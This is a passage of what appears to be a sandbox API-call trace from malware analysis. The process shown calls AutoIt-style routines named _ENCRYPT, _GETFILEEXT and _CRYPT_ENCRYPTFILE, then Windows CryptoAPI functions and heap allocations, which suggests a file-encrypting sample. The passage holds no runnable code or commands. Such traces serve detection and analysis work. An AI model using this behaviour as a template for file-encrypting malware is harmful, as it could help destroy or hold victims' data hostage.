lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.063] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.063] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.063] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.063] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.064] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.064] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.064] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.064] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.064] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.064] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.064] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.064] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.064] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.064] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.064] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.065] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.065] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.065] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.065] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.066] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.066] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.066] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.066] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.067] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.067] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.067] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.068] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.068] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.068] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.068] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.068] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.068] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.068] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.068] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.068] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.068] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.068] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.068] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.068] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.068] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.068] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.068] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.068] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.069] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.069] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.069] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.069] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.069] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.069] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0158.069] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.069] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.069] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.069] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.070] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0158.070] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.074] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.074] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.074] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.074] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.074] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.074] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.074] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.074] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.074] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.075] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.075] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.075] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.075] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.075] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.075] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.075] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.075] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.075] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.075] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.075] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.075] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.075] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.076] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.076] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.076] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.076] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.076] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.076] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.076] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.077] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.077] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.077] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.077] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.077] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.077] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.077] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.077] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.077] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.077] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.078] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.078] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.195] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.195] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.195] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.195] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0158.195] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0158.195] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0158.196] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0158.196] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0158.196] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0158.196] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0158.196] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.196] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0158.196] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.196] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.196] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0158.258] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0158.258] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.260] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0158.260] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0158.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0158.261] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0158.261] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.261] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.261] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0158.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0158.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0158.262] RtlAllocateHeap (HeapHandle=0x8a0000, 